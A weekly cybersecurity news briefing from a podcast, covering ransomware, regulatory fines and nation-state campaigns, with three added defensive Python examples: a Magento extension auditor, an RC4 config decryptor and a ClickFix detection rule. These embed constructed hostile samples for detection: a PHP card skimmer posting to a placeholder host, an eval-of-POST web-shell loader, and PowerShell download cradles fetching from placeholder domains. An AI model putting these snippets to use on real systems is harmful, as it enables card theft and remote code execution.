Top Cybersecurity News Weekly Summary – Week of May 5th, 2025
Ransomware Waves, Regulatory Rumbles, and Nation-State Nexus — your one-stop briefing on the week’s most consequential cyber events (May 5 – May 9, 2025)
Happy Friday Security Gang,
Another whirlwind week in cybersecurity saw luxury retailers fend off nation-state-linked ransomware, critical infrastructure reel from a spike in OT attacks, and regulators levy record-setting fines that could reshape vendor liability. At the same time, law-enforcement cooperation notched rare wins against high-profile ransomware operators—even as Russia blended cyber disruption with physical sabotage across Europe.
From stealthy supply-chain backdoors in Magento extensions to a fresh zero-click exploit in Apple AirPlay, the stories below capture where defenses crumbled, where they held firm, and what every security leader should do next. Dive in to get up to speed before Monday’s inbox flood—then pass the knowledge on to keep your organization, and the wider “security gang,” one step ahead.
1. Retail & E-Commerce Under Fire
Harrods Dodges DragonForce Ransomware – DragonForce actors reportedly phished a privileged employee, then moved laterally looking for Ivanti gateways that had not yet received January’s patches. The retailer’s SOC caught the movement early and blocked east-west traffic, preventing data theft or service outages. UK officials say this wave tracks closely with Chinese economic retaliation during tariff talks, echoing the “economic coercion” playbook used against Australia in 2020.
Magento Extension Backdoors – Threat hunters at Sansec traced the malicious code to a GitHub account that had been dormant since 2019, suggesting a long-game supply-chain strategy. Once activated, the backdoor replaced checkout pages with card-skimming versions and dropped web shells for persistent access. The victim list spans luxury fashion to a Fortune 250 electronics giant, showing how one compromised extension repo can break hundreds of storefronts in a single stroke.
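A backdoor that sat dormant in a vendor repo for years will pass a hash check against the vendor's own manifest, so an extension audit needs both a file-level diff and a content scan of every PHP file. The script below is an added example for this briefing (it also covers the "Audit Extensions & Plugins" action item further down); it is not Sansec's scanner or Magento's tooling. The three-file extension, the tampered copy, the manifest and the indicator regexes are all constructed for illustration, not indicators from the Sansec report.

```python
"""Magento extension audit: diff the installed tree against a manifest of
known-good hashes and scan every PHP/PHTML file for web-shell and skimmer
constructs. Added example for this briefing, not Sansec's scanner or
Magento's tooling. Files, manifest and patterns below are constructed."""
import hashlib
import os
import re
import tempfile

# Illustrative indicator patterns, not the IOCs from the Sansec report.
SUSPICIOUS = {
    "eval-of-decoded-blob": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    "request-to-shell": re.compile(
        r"\b(?:system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)"),
    "card-field-exfil": re.compile(
        r"(?:cc_number|card_number|cc_cid|cvv)[\s\S]{0,300}?"
        r"(?:curl_init|fsockopen|file_get_contents\s*\(\s*['\"]https?://)"),
}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_php(path):
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        src = f.read()
    return [name for name, rx in SUSPICIOUS.items() if rx.search(src)]


def audit_extension(root, manifest):
    """manifest: {relative_path: sha256} of the build you believe is clean.
    Every PHP file is content-scanned, not only the changed ones: a backdoor
    planted before the manifest was taken would otherwise pass as known-good."""
    on_disk = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            on_disk[rel] = sha256_file(full)
    report = {
        "added": sorted(set(on_disk) - set(manifest)),
        "missing": sorted(set(manifest) - set(on_disk)),
        "modified": sorted(p for p in on_disk if p in manifest and on_disk[p] != manifest[p]),
        "flagged": {},
    }
    for rel in sorted(on_disk):
        if rel.endswith((".php", ".phtml")):
            hits = scan_php(os.path.join(root, rel))
            if hits:
                report["flagged"][rel] = hits
    return report


def build_demo():
    """Write a constructed three-file extension, then tamper with it the way the
    Magento backdoors did: a skimmer spliced into the checkout block, a loader
    disguised as a licence check, and one original file removed."""
    clean = {
        "registration.php": "<?php\n// component registration stub (constructed)\n",
        "etc/module.xml": '<?xml version="1.0"?>\n<config><module name="Acme_Demo"/></config>\n',
        "Block/Checkout.php": "<?php\nnamespace Acme\\Demo\\Block;\n"
                              "class Checkout { public function render() { return 'ok'; } }\n",
    }
    manifest = {p: hashlib.sha256(c.encode()).hexdigest() for p, c in clean.items()}
    tampered = dict(clean)
    tampered["Block/Checkout.php"] += (
        "$cc = $_POST['cc_number'] ?? '';\n"
        "$ch = curl_init('https://collector.invalid/c');\n"
        "curl_setopt($ch, CURLOPT_POSTFIELDS, $cc); curl_exec($ch);\n")
    tampered["Helper/License.php"] = "<?php\n// 'licence check'\neval(base64_decode($_POST['k']));\n"
    del tampered["etc/module.xml"]
    root = tempfile.mkdtemp(prefix="magento_ext_")
    for rel, content in tampered.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8", newline="") as f:
            f.write(content)
    return root, manifest


if __name__ == "__main__":
    root, manifest = build_demo()
    for key, value in audit_extension(root, manifest).items():
        print(f"{key}: {value}")
```

Run it against a real `app/code/Vendor/Module` tree by building the manifest from a fresh download of the vendor package; anything in "added" or "flagged" is quarantined until a human has read it, and the patterns should be extended with the indicators your threat-intel feed carries rather than trusted as a complete list.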
2. Critical Infrastructure & Supply Chain
Food & Ag Ransomware Spike – Clop shifted from MOVEit to the file-transfer platforms common in grain-trading co-ops, locking up logistics databases at harvest time—prime extortion leverage. ISAC analysts worry that only ~30 percent of incidents get reported, so the real numbers could be far higher. The White House is pushing voluntary data-sharing, but many growers lack even the basic telemetry needed to contribute.
South African Airways & Massimo Corp. – SAA’s segmented network kept flight-control and booking systems on separate VLANs, limiting damage to the public-facing app. Massimo, by contrast, runs a unified ERP/MES stack; when attackers encrypted one Windows domain controller, the outage cascaded into production downtime, triggering an 8-K filing under the SEC rule that requires disclosure within four business days of a materiality determination. Both cases show how architecture choices dictate breach impact.
Oil & Gas Sector Alert – Investigators found dozens of pipeline-compressor PLCs reachable over the internet with default passwords during the joint FBI/CISA scan. The advisory calls for phishing-resistant MFA on VPNs and out-of-band OT monitoring, warning that Russia-linked actors are upgrading wiper malware to hit physical safety systems.
3. Malware & Exploits
StealC v2 Super-Stealer – The new loader encrypts its configuration with RC4, keyed by a hard-coded Telegram channel name, so static IOC matching against the binary finds nothing. It also self-deletes after exfil, reducing forensic artifacts and forcing responders to rely on memory captures. Researchers say its subscription price on dark-web markets jumped from $200 to $1,500 overnight—a sign of brisk criminal demand.
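The RC4-keyed-by-an-embedded-string design cuts both ways: the ciphertext carries no matchable C2 strings, but the key itself sits in the binary's string table, so an analyst can try every extracted string as the key and stop at the one that yields a parseable config. The block below is an added example for this briefing, not StealC v2 code or a published decryptor; the config layout, the key string and the hostnames are constructed placeholders, and the string table is what such a sample's `strings` output might plausibly contain.

```python
"""RC4-encrypted stealer config: why a static IOC scan of the ciphertext is
empty, and how keying RC4 with each embedded string recovers the plaintext.
Added example; key, config layout and hostnames are constructed, not StealC's."""


def rc4_keystream(key: bytes):
    """Standard RC4: key-scheduling, then the PRGA yielding one byte at a time."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def parse_config(plaintext: bytes):
    """Accept only fully printable ASCII that parses into at least two key=value fields;
    a wrong RC4 key produces bytes that fail this almost immediately."""
    if not plaintext or any(b < 0x20 or b > 0x7E for b in plaintext):
        return None
    fields = {}
    for item in plaintext.decode("ascii").split(";"):
        if "=" in item:
            k, v = item.split("=", 1)
            fields[k.strip()] = v.strip()
    return fields if len(fields) >= 2 else None


def recover_config(blob: bytes, candidate_keys):
    """Analyst workflow: try each string pulled from the sample as the RC4 key."""
    for cand in candidate_keys:
        cfg = parse_config(rc4_crypt(cand.encode(), blob))
        if cfg:
            return cand, cfg
    return None, None


def ioc_hits(haystack: bytes, iocs):
    """Naive static IOC match, the check that the encrypted config defeats."""
    return [i for i in iocs if i.encode() in haystack]


def build_sample():
    """Constructed: a config blob as it would sit in the binary, plus the kind of
    string table an analyst would extract from it (the key hides in there)."""
    config = "c2=panel.example.invalid;port=443;build=demo-2025-05;tg=@constructed_channel"
    key = "@constructed_channel"  # stands in for the hard-coded channel name
    blob = rc4_crypt(key.encode(), config.encode())
    strings = ["kernel32.dll", "GetProcAddress", "Mozilla/5.0", key, "SELECT * FROM logins"]
    return blob, strings


if __name__ == "__main__":
    blob, strings = build_sample()
    print("IOC hits on ciphertext:", ioc_hits(blob, ["panel.example.invalid"]))
    print("recovered:", recover_config(blob, strings))
```

The practical lesson is the one the briefing draws: hunt on the key material and the decrypted config (or on memory, where the plaintext must exist), not on the bytes as they sit on disk. `rc4_crypt` is checked in the test against the standard "Key"/"Plaintext" RC4 test vector.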
LangFlow, MagicInfo CMS & AirPlay Bugs – Proof-of-concept code for the LangFlow RCE hit GitHub within hours of the CVE being published, and honeypots saw exploitation within 24 hours. Samsung MagicInfo signage boxes are popular in airports and malls; many owners never patch because they treat them like “dumb TVs,” creating perfect botnet nodes. AirBorne, the AirPlay flaw set, is meanwhile Apple’s third wireless-attack disclosure in six months, underlining how convenience features often outrun security hardening.
Linux Disk-Wiper Supply-Chain Attack – The three malicious Golang modules masqueraded as k8s helpers but fetched a Rust wiper that overwrote partitions with random bytes. The campaign echoes HermeticWiper used in Ukraine, raising fears that destructive techniques are becoming commoditized for anyone with GitHub access.
4. Legal, Regulatory & Corporate Fallout
TikTok’s €530 M GDPR Fine – Investigators found that TikTok’s Chinese employees could query EU user data via internal dashboards—contradicting public assurances of “thick-walled” segregation. The decision forces the platform to store encryption keys inside the EU or face daily penalties, much like Meta’s 2023 Schrems II case. Expect other data-hungry apps to revisit their “standard contractual clauses” playbooks fast.
Raytheon’s $8.4 M DFARS Settlement – Auditors spotted code repos holding ITAR-controlled data on servers without two-factor authentication, in breach of the DFARS 252.204-7012 safeguarding clause. Although the payout is small for RTX, it signals that DOJ is willing to treat cyber non-compliance like defective parts under False Claims Act precedent—an expensive shift in defense-industry risk models.
NSO Group’s $168 M Judgment – Plaintiffs argued NSO “knowingly facilitated” illegal hacks by government clients; the jury agreed despite EULA clauses disclaiming misuse. Legal scholars say the verdict could embolden future suits against dual-use tool vendors, pressuring them to build kill-switches or vet end-users more rigorously.
Congress Eyes CISA Cuts – Lawmakers fear trimming ISAC grants weakens local election support just as AI-generated disinformation surges. DHS counters that reallocating funds to “core” vulnerability disclosure programs will deliver better ROI, setting up a tense appropriations fight this summer.
5. Law-Enforcement Wins & Misses
Black Kingdom & Nefilim Arrests – Rami Ahmed’s indictment leverages FBI log data from seized Exchange servers, linking Bitcoin addresses to Yemeni SIM registrations. Artem Stryzak’s extradition took just ten months—remarkably fast—thanks to Spain’s 2023 cyber-treaty amendments, suggesting the legal pipeline for ransomware crooks is tightening.
LockBit Gets Hacked – A rival crew exploited an outdated CMS plugin on LockBit’s hidden-service panel, then dumped affiliate IDs and chat logs. While no decryption keys surfaced, victim negotiators can now correlate wallet addresses to gang members, potentially aiding sanctions designations.
6. Education & Public Sector
Coweta Schools & Western NMU Offline – Coweta’s mis-routed call to DHS delayed incident-response assistance by 18 hours, illustrating the importance of knowing “who to call” before crisis hits. NMU’s month-long outage stemmed from backups that were online—and thus encrypted—forcing a ground-up rebuild of Active Directory. Both events renew debate over mandatory K-12 cyber funding.
PowerSchool Secondary Extortion – Attackers scraped district emails from stolen PowerSchool files and are sending personalized threats to superintendents, demanding payments as low as $5,000. This decentralized shakedown model mirrors the scatter-shot extortion that followed the 2023 Progress MOVEit breach, proving ransomware gangs will monetize every inch of a supply-chain breach.
7. Nation-State & Geopolitics
Russian Hybrid Ops in Europe – UK MI5 linked DHL parcel bombs to pro-Kremlin group Wagner 2025, citing overlaps in VPN infrastructure also used in wiper attacks on Polish railways. Officials warn that physical sabotage paired with cyber disruption can amplify psychological impact on NATO publics.
Poland Pre-Election Attacks & Ukrainian TikTok Spy – Poland’s CERT reported 40+ phishing waves spoofing election-commission domains, many signing payloads with leaked Ukrainian certs to muddy attribution. Meanwhile, the Donetsk spy case shows how low-level HUMINT can still feed artillery targeting even in a drone-saturated battlefield.
Star Blizzard Phishing Campaigns – ClickFix lures present a fake Teams MFA prompt; if victims comply, malware side-loads via a signed driver, bypassing EDR. Google’s Threat Intelligence Group says LostKeys beacons to compromised Czech hosting firms, complicating takedowns and offering the FSB deniability.
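Whatever the lure looks like, ClickFix chains share one telemetry signature worth a detection rule: the victim pastes a command into the Windows Run dialog, so the resulting PowerShell (or mshta/cmd) process is a child of explorer.exe and carries a download cradle, usually wrapped in window-hiding flags and often base64-encoded behind -enc. That Run-dialog parentage is the general ClickFix pattern and an assumption here; the briefing itself only describes the prompt. The detector below is an added example, not Google's LostKeys signatures, and the four Sysmon-style records it runs over are constructed with placeholder hostnames.

```python
"""Flag the ClickFix execution chain in process-creation telemetry: a child of
explorer.exe (Run-dialog paste) that fetches a second stage. Added example,
not vendor signatures; records are constructed Sysmon-style events."""
import base64
import json
import re

# Binaries a pasted Run-dialog command typically ends up in (assumption).
RUN_DIALOG_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                       "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
CRADLE = re.compile(
    r"(?i)(?:\biex\b|invoke-expression|downloadstring|downloadfile|invoke-webrequest|"
    r"\biwr\b|\bcurl\b|mshta\s+https?://|certutil\b.*-urlcache|frombase64string)")
HIDING = re.compile(
    r"(?i)(?:-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass)")
ENCODED = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline):
    """PowerShell -EncodedCommand is base64 of UTF-16LE; '' if absent or invalid."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:
        return ""


def score_event(ev):
    """Return the reasons this event matches the ClickFix chain ([] if it does not)."""
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    if parent != "explorer.exe" or image not in RUN_DIALOG_CHILDREN:
        return []
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    visible = ENCODED.sub("-enc <blob>", cmd)  # never regex-match inside the base64 itself
    reasons = []
    if CRADLE.search(visible):
        reasons.append("download-cradle")
    if decoded and CRADLE.search(decoded):
        reasons.append("download-cradle-in-encoded-command")
    if HIDING.search(visible):
        reasons.append("window-hiding-or-policy-bypass")
    # Hiding flags alone are noisy (admins use them); require a cradle somewhere.
    return reasons if any(r.startswith("download-cradle") for r in reasons) else []


def detect(json_lines):
    """Run the rule over newline-delimited JSON events; return (RecordId, reasons) hits."""
    hits = []
    for line in json_lines:
        ev = json.loads(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["RecordId"], reasons))
    return hits


def _ev(rid, parent, image, cmdline):
    return json.dumps({"RecordId": rid, "ParentImage": parent, "Image": image, "CommandLine": cmdline})


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://c2.invalid/a')".encode("utf-16le")).decode()

SAMPLE_LOG = [  # constructed records; hostnames are placeholders
    _ev(1, r"C:\Windows\explorer.exe", PS,
        'powershell -w hidden -nop -c "iex (iwr https://teams-verify.invalid/mfa.txt).Content"'),
    _ev(2, r"C:\Windows\explorer.exe", PS, f"powershell.exe -nop -w hidden -enc {ENC_PAYLOAD}"),
    _ev(3, r"C:\Windows\explorer.exe", PS, "powershell.exe"),  # user simply opened a console
    _ev(4, r"C:\Windows\System32\svchost.exe", PS, "powershell.exe -NoProfile -File C:\\ops\\backup.ps1"),
]

if __name__ == "__main__":
    for rid, reasons in detect(SAMPLE_LOG):
        print(rid, reasons)
```

Records 1 and 2 fire; record 3 (an interactive console) and record 4 (a scheduled script under svchost.exe) do not, because the rule is scoped to the paste-into-Run chain rather than to every encoded PowerShell command. A signed-driver side-load that follows, as the briefing describes, is a separate hunt (driver-load events and service creation), which this rule deliberately does not attempt.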
📌 Rapid-Fire Action Items
Refresh Threat Intel: Fold DragonForce and StealC v2 TTPs and the Magento backdoor indicators into your detection feeds.
Audit Extensions & Plugins: Validate all Magento (and equivalent) add-ons; yank or sandbox anything unvetted.
Harden Food-Ag & OT Segments: Verify backups, MFA and network isolation where IT meets OT.
Patch Immediately: Prioritize LangFlow 1.3.0, Samsung MagicInfo, Apple AirPlay, Cisco IOS XE, SonicWall SMA and Android May updates.
Review Data-Transfer Controls: Map EU-to-non-EU flows and enforce SCCs or alternative safeguards ahead of potential fines.
Test Incident Response Drills: Rehearse ransomware and wiper scenarios—especially for school districts and manufacturing lines.
Monitor Vendor Compliance: Use the UK NCSC Secure-by-Default principles as a scoring matrix for suppliers.
Stay cyber safe, Security Gang!
✅ Stay Connected With Us.
👉Facebook: https://www.facebook.com/CyberHubpodcast/
👉LinkedIn: https://www.linkedin.com/company/cyberhubpodcast/
👉Twitter (X): https://twitter.com/cyberhubpodcast
👉Instagram: https://www.instagram.com/cyberhubpodcast
🤝 For Business Inquiries: info@cyberhubpodcast.com
=============================
🚀 About The CyberHub Podcast.
The Hub of the Infosec Community.
Our mission is to provide substantive and quality content that’s more than headlines or sales pitches. We want to be a valuable source to assist those cybersecurity practitioners in their mission to keep their organizations secure.
Tune in to our podcast Monday through Thursday at 9AM EST for the latest news.
For Collaboration and Business inquiries, please use the contact information below:
📩 Email: info@cyberhubpodcast.com